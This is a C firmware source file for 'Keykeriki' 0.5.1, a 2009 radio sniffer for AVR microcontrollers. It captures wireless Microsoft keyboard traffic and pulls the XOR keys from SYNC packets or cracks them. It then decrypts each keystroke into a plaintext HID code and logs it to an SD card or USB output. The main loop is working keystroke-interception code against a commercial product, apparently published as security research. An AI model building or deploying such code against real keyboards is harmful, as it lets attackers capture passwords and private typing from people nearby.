/* 
 * $Id: main.c 32 2009-06-07 20:11:05Z ths $
 *
 * Microsoft keyboard specific Miller Decoding for 8-bit microcontrollers
 *
 * Authors/Copyright:
 *    Max Moser <mmo  (at)  remote-exploit.org>
 *    Thorsten Schroeder <ths  (at)  dev.io>
 *
 * Revision: $Rev: 32 $
 *
 * Switzerland, Berne, 2009/04/22
 *
 * */

/* includes */
#include <avr/io.h>
#include <avr/interrupt.h>
#include <avr/eeprom.h>
#include <util/delay.h>
#include <stdio.h>
#include <string.h>
	


#define MAXLINE 75
#define SELF      "Keykeriki"
#define RELEASE   "0.5.1"

#define LED_PORT PORTG
#define LED_PIN  PG0
 

/* local includes */

#include "serial.h"
#include "helper.h"
#include "main.h"
#include "eeprom.h"
#include "fifo.h"
#include "twi.h"
#include "sd.h"
#include "hid.h"
#include "crack.h"
#include "command.h"
#include "trf7900.h"


#define FIFO_BUFSIZE 128
uint8_t fi_buffer[FIFO_BUFSIZE];
fifo_t fifo;
uint8_t rssi;
uint16_t off_cnt = 0;

keykeriki_cmd cmd;

#ifdef WITH_DECRYPT
/* XOR keys for channels 1 + 2 */
uint8_t  key_chA = 0;
uint8_t  key_chB = 0;
uint8_t  history[CRACK_HISTSIZE];
#endif

/* SD card sector buffer */
uint8_t buf[DATA_BLOCK_SIZE]; 
uint16_t buf_idx = 0;
unsigned long sd_addr = 0;

/* globals */
// static char _file_id[]  = "$Id: main.c 32 2009-06-07 20:11:05Z ths $";
static char _file_rev[] = "$Rev: 32 $";

keykeriki_config config;



#ifdef WITH_SECOND_UART
FILE *disp = NULL;
#endif


/* Used for debugging using an oscilloscope (and for *bling bling*) */
void togglepin (void)
{
	LED_PORT ^= (1 << LED_PIN); /* Toggle debugpin */
}

int main(void)
{
   unsigned char data[2];
   char result[32];

   uint8_t out[16];
   //uint8_t ret=0;

	DDRG  = (1<<LED_PIN);
	PORTG = 0x00;

   memset(&cmd,0,sizeof(cmd));
   memset(&config,0,sizeof(config));

   /* init keykeriki */
   keykeriki_init();
 	
	/* init serial interface / usart */
	serial_init(1, config.usart1_baud);

#ifdef WITH_SECOND_UART
   if(config.enable_2nd_usart) {
      serial_init(0, config.usart0_baud);
      disp = fdevopen(serial_write_char_0, NULL);
   }
#endif

   _delay_ms(200);

   fprintf_P(disp, PSTR("w00t!!1\n"));

	printf_P(PSTR("[*] Booting %s (%s)...\r\n"), SELF, _file_rev);
   printf_P(PSTR("[*] TWI master init: %d\r\n"), twi_master_init(100000) );

   _delay_ms(200);

   /* TRF7900 init */
   trf7900_init(TRF7900_ADDR);

	/* disable analog comperator */
	SFIOR &= ~(1<<ACME);
	ACSR  |= (1<<ACD);

	TCCR1A = 0x00;
	TIMSK |= (1 << TICIE1);    /* Enable CTC interrupt */
	TCCR1B |= (1 << CS12);     /* set prescaler to 256 */
//	TCCR1B |= (1 << ICNC1);     /* activate input capture noise canceler */
	
	printf_P(PSTR("[*] Fifo init (%04x)... "), FIFO_BUFSIZE);
	fifo_init (&fifo, fi_buffer, FIFO_BUFSIZE);       
	printf_P(PSTR("done\r\n"));


#ifdef WITH_SDCARD
   if(config.enable_sd) {
      sd_init();
      _delay_ms(200);
   }
#endif
	
   /* Enable interrupts */
	sei(); 

   memset(&out, 0x0, sizeof(out));

#ifdef WITH_DECRYPT
   if(config.enable_crack)
      crack_init();
#endif


   printf_P(PSTR("\r\n[*] **************************************************** \r\n"));
   printf_P(PSTR("[*] %s %s (%s)\r\n"), SELF, RELEASE, _file_rev);
   printf_P(PSTR("[*] Author(s)\r\n"));
   printf_P(PSTR("[*]   Max Moser <mmo\x40remote-exploit.org>\r\n"));
   printf_P(PSTR("[*]   Thorsten Schroeder <ths\x40remote-exploit.org>\r\n"));
   printf_P(PSTR("[*] URL(s)\r\n"));
   printf_P(PSTR("[*]   http://www.remote-exploit.org/Keykeriki.html\r\n"));
   printf_P(PSTR("[*] **************************************************** \r\n"));
   printf_P(PSTR("[+] System ready.\r\n"));

	/* loop */
	for(;;) {
	
		uint8_t i = 0;

      /* wait for 8 byte frame */
      while(fifo.count < 8) {
         if(cmd.rdone) {
            process_cmd(cmd.line, result, (uint16_t)sizeof(result));
            cli();
            memset(&cmd,0,sizeof(cmd));
            sei();
         }
      }

		for(i=0;i<8;i++) {
			out[i] = fifo_get_wait(&fifo);
		}

#ifdef WITH_RSSI
      if(config.enable_rssi) {
         twi_master_read(TRF7900_ADDR, data, 1);
         printf_P(PSTR("[~] rssi: %02x\r\n"), data[0]);
      }
#endif


#ifdef WITH_DECRYPT
      if(config.enable_decrypt) {
         switch(out[0]) {
            case 0x03:
               break;
            case 0x04:
               break;
            case 0x05:  /* Key Press/Release */
               
               if((key_chA == 0x00)) {
                  if( (( out[2] & 0xf0 ) == 0x70) && config.enable_crack )
                     crypto_analyse(out[3], out[4]);

                  break;
               }

               out[8] = key_chA;
               out[9] = key_chB;
               out[10] = out[4]^key_chA;  /* plaintext HID code */
               out[11] = KBD_LAYOUT;      /* Keyboard layout */
               out[12] = hid_decode(out[10], out[3]);

               break;

            case 0x06:  /* SYNC */
               
               /*
                * I would bet, they're using those 6 bit as packet type
                * identifier since packet length is not very reliable... */
               
               if( (out[2] & 0xFC) == 0x18 ) {
                  out[8] = out[4];
                  out[9] = out[3];
                  crypto_setkey(TRF_CHAN_A,  out[4]);
                  crypto_setkey(TRF_CHAN_B,  out[3]);
               }
               break;

            default:
               break;
         }
      } /* if enable decrypt */

#endif

#ifdef USBOUT
      if(config.enable_usbout)
         if( ( out[2] & 0xf0 ) == 0x70)
            putc(out[12], stdout);
#endif


#ifdef WITH_SDCARD
      if(config.enable_sd)
         sd_store(out, sizeof(out)); 
#endif

      memset(&out, 0, sizeof(out));

      off_cnt += 8;
	}
	return(0);
}


void keykeriki_init(void)
{
   eeprom_busy_wait();
   eeprom_read_block(&config.enable_2nd_usart , 
         &ee_cfg_enable_secondary_uart, sizeof(config.enable_2nd_usart ));

   eeprom_busy_wait();
   eeprom_read_block(&config.enable_rssi, 
         &ee_cfg_enable_rssi, sizeof(config.enable_rssi ));

   eeprom_busy_wait();
   eeprom_read_block(&config.enable_crack , 
         &ee_cfg_enable_crack, sizeof(config.enable_crack ));

   eeprom_busy_wait();
   eeprom_read_block(&config.enable_usbout , 
         &ee_cfg_enable_usb, sizeof(config.enable_usbout ));

   eeprom_busy_wait();
   eeprom_read_block(&config.sd_append , 
         &ee_cfg_enable_sdcard_append, sizeof(config.sd_append ));

   eeprom_busy_wait();
   eeprom_read_block(&config.enable_sd , 
         &ee_cfg_enable_sdcard, sizeof(config.enable_sd ));

   eeprom_busy_wait();
   eeprom_read_block(&config.enable_decrypt ,
         &ee_cfg_enable_decrypt, sizeof(config.enable_decrypt ));

   eeprom_busy_wait();
   eeprom_read_block(&key_chA , 
         &ee_cfg_crypto_key_a, sizeof(key_chA));

   eeprom_busy_wait();
   eeprom_read_block(&key_chB ,
         &ee_cfg_crypto_key_b, sizeof(key_chB));

   eeprom_busy_wait();
   eeprom_read_block(&config.usart1_baud, 
         &ee_cfg_usart1_baud, sizeof(config.usart1_baud));

   eeprom_busy_wait();
   eeprom_read_block(&config.usart0_baud,
         &ee_cfg_usart0_baud, sizeof(config.usart0_baud));

   return;
}

void keykeriki_dumpconfig(void)
{

   printf_P(PSTR("\r\n[*] config dump:\r\n"));
   printf_P(PSTR("[-] trf7900: address        = 0x%02x\r\n"), trf7900_getaddr());
   printf_P(PSTR("[-] trf7900: mode           = 0x%02x\r\n"), trf7900_getmode());
   printf_P(PSTR("[-] trf7900: res            = 0x%02x\r\n"), trf7900_getres());
   printf_P(PSTR("[-] trf7900: freq_a         = 0x%02x\r\n"), trf7900_getfreq_a());
   printf_P(PSTR("[-] trf7900: freq_b         = 0x%02x\r\n"), trf7900_getfreq_b());
   
   printf_P(PSTR("[-] cfg: enable_rssi        = 0x%02x\r\n"), config.enable_rssi );
   printf_P(PSTR("[-] cfg: enable_usbout      = 0x%02x\r\n"), config.enable_usbout );
   printf_P(PSTR("[-] cfg: enable_sd          = 0x%02x\r\n"), config.enable_sd );
   printf_P(PSTR("[-] cfg: enable_crack       = 0x%02x\r\n"), config.enable_crack );
   printf_P(PSTR("[-] cfg: enable_decrypt     = 0x%02x\r\n"), config.enable_decrypt );
   printf_P(PSTR("[-] cfg: enable_2nd_usart   = 0x%02x\r\n"), config.enable_2nd_usart );
   printf_P(PSTR("[-] cfg: usart0_baud        = %li\r\n"), (config.usart0_baud) );
   printf_P(PSTR("[-] cfg: usart1_baud        = %li\r\n"), (config.usart1_baud) );
   eeprom_busy_wait();
   printf_P(PSTR("[-] cfg: kbd vendor         = 0x%02x\r\n"), eeprom_read_byte(&ee_cfg_kbd_vendor));
   eeprom_busy_wait();
   printf_P(PSTR("[-] cfg: kbd model          = 0x%02x\r\n"), eeprom_read_byte(&ee_cfg_kbd_model));

   printf_P(PSTR("[-] crypto: key_chA         = 0x%02x\r\n"), key_chA );
   printf_P(PSTR("[-] crypto: key_chB         = 0x%02x\r\n"), key_chB );
   
   return;
}
